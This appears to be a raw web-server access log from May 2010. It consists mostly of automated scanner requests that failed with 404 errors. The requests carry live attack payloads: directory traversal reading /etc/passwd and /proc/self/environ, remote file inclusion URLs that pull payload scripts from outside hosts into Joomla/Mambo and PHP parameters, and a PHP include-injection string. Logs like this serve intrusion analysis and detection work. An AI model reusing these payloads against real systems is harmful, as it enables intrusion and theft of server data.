207.46.199.54 - - [19/May/2010:10:34:35 -0500] "GET /logs/access_log.1170720000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.23.18.102 - - [19/May/2010:10:35:07 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.18.102 - - [19/May/2010:10:35:07 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.18.102 - - [19/May/2010:10:35:08 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
217.149.62.1 - - [19/May/2010:10:35:21 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
217.149.62.1 - - [19/May/2010:10:35:21 -0500] "GET /index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
217.149.62.1 - - [19/May/2010:10:35:22 -0500] "GET /logs/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
217.73.227.210 - - [19/May/2010:10:35:51 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
217.73.227.210 - - [19/May/2010:10:35:51 -0500] "GET /index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
217.73.227.210 - - [19/May/2010:10:35:52 -0500] "GET /logs/index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
134.147.125.103 - - [19/May/2010:10:37:01 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
81.80.122.44 - - [19/May/2010:10:37:01 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
81.80.122.44 - - [19/May/2010:10:37:01 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
81.80.122.44 - - [19/May/2010:10:37:02 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
94.23.18.102 - - [19/May/2010:10:37:20 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.18.102 - - [19/May/2010:10:37:20 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.18.102 - - [19/May/2010:10:37:20 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.18.102 - - [19/May/2010:10:40:31 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
121.88.4.141 - - [19/May/2010:10:42:00 -0500] "GET /logs//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:10:42:00 -0500] "GET //thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:10:42:00 -0500] "GET /logs/access_log.1264636800//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:10:42:02 -0500] "GET /logs/access_log.1270598400//thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
207.46.195.242 - - [19/May/2010:10:44:06 -0500] "GET /logs/access_log.1180656000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:10:47:53 -0500] "GET /logs/access_log.1228780800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.88.4.141 - - [19/May/2010:10:48:14 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://140.127.114.109:8080/id? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
88.191.94.188 - - [19/May/2010:10:51:42 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:10:51:42 -0500] "GET /logs/access_log.1271548800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:10:51:43 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 295 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:10:51:45 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 295 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:10:51:45 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:10:51:45 -0500] "GET /logs/access_log.1271548800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:10:51:56 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:10:51:56 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:10:51:57 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:10:51:57 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:10:51:57 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:10:51:57 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:10:52:10 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:10:52:13 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.195.112.180 - - [19/May/2010:10:52:14 -0500] "GET /rachel%20study/ HTTP/1.0" 404 285 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
219.142.121.41 - - [19/May/2010:10:54:38 -0500] "GET //errors.php?error=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
94.125.182.40 - - [19/May/2010:10:54:38 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 352 "-""libwww-perl/5.813"
219.142.121.41 - - [19/May/2010:10:54:38 -0500] "GET /logs//errors.php?error=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
94.125.182.40 - - [19/May/2010:10:54:39 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 357 "-""libwww-perl/5.813"
121.88.4.141 - - [19/May/2010:10:54:55 -0500] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:10:54:55 -0500] "GET /logs/access_log.1270598400//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:10:54:56 -0500] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:10:55:09 -0500] "GET /logs/access_log.1270512000//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 387 "-""Mozilla/5.0"
207.45.182.18 - - [19/May/2010:10:55:32 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
207.45.182.18 - - [19/May/2010:10:55:32 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.45.182.18 - - [19/May/2010:10:55:40 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
207.45.182.18 - - [19/May/2010:10:55:41 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
207.45.182.18 - - [19/May/2010:10:55:42 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
207.45.182.18 - - [19/May/2010:10:55:42 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
88.191.94.188 - - [19/May/2010:10:56:17 -0500] "GET /logs/access_log.1272585600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
88.191.94.188 - - [19/May/2010:10:56:18 -0500] "GET /logs/access_log.1272585600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
202.72.242.242 - - [19/May/2010:10:56:37 -0500] "GET //skin/zina02_purple/setup.php?dir=http://www.lafranceenaction.com/includes/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
202.72.242.242 - - [19/May/2010:10:56:37 -0500] "GET /logs//skin/zina02_purple/setup.php?dir=http://www.lafranceenaction.com/includes/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
202.72.242.242 - - [19/May/2010:10:56:37 -0500] "GET /logs/access_log.1265414400//skin/zina02_purple/setup.php?dir=http://www.lafranceenaction.com/includes/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
81.177.13.130 - - [19/May/2010:10:56:52 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:10:56:55 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
88.191.94.188 - - [19/May/2010:10:56:56 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.177.13.130 - - [19/May/2010:10:56:56 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:10:56:57 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:10:56:57 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
88.191.94.188 - - [19/May/2010:10:56:57 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:10:57:00 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
121.88.4.141 - - [19/May/2010:10:57:25 -0500] "GET /logs/access_log.1217376000//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://140.127.114.109:8080/id? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
121.88.4.141 - - [19/May/2010:10:57:26 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://140.127.114.109:8080/id? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
121.88.4.141 - - [19/May/2010:10:57:26 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://140.127.114.109:8080/id? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
216.245.220.19 - - [19/May/2010:10:57:40 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:10:58:02 -0500] "GET /logs/access_log.1213833600//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://140.127.114.109:8080/id? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
216.245.220.19 - - [19/May/2010:10:58:06 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
94.125.182.40 - - [19/May/2010:11:00:17 -0500] "GET //poc.php?sourcedir=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:11:00:17 -0500] "GET /logs//poc.php?sourcedir=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.813"
211.115.111.115 - - [19/May/2010:11:02:57 -0500] "GET /logs/access_log.1273363200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://liceum3.ru/help/sh/id.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
211.115.111.115 - - [19/May/2010:11:02:57 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://liceum3.ru/help/sh/id.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
211.115.111.115 - - [19/May/2010:11:02:57 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://liceum3.ru/help/sh/id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
211.115.111.115 - - [19/May/2010:11:03:10 -0500] "GET /logs/access_log.1273276800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://liceum3.ru/help/sh/id.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
88.191.94.188 - - [19/May/2010:11:04:14 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:11:04:15 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:11:04:15 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:11:04:44 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:11:04:45 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [19/May/2010:11:04:45 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.177.13.130 - - [19/May/2010:11:04:56 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:11:04:56 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:11:04:57 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:11:04:57 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:11:04:57 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:11:04:57 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.125.182.40 - - [19/May/2010:11:04:57 -0500] "GET //poc.php?sourcedir=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.813"
94.125.182.40 - - [19/May/2010:11:04:57 -0500] "GET /logs//poc.php?sourcedir=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.813"
81.177.13.130 - - [19/May/2010:11:05:26 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:11:05:26 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:11:05:26 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:11:05:26 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:11:05:27 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
81.177.13.130 - - [19/May/2010:11:05:27 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
88.191.94.188 - - [19/May/2010:11:05:28 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
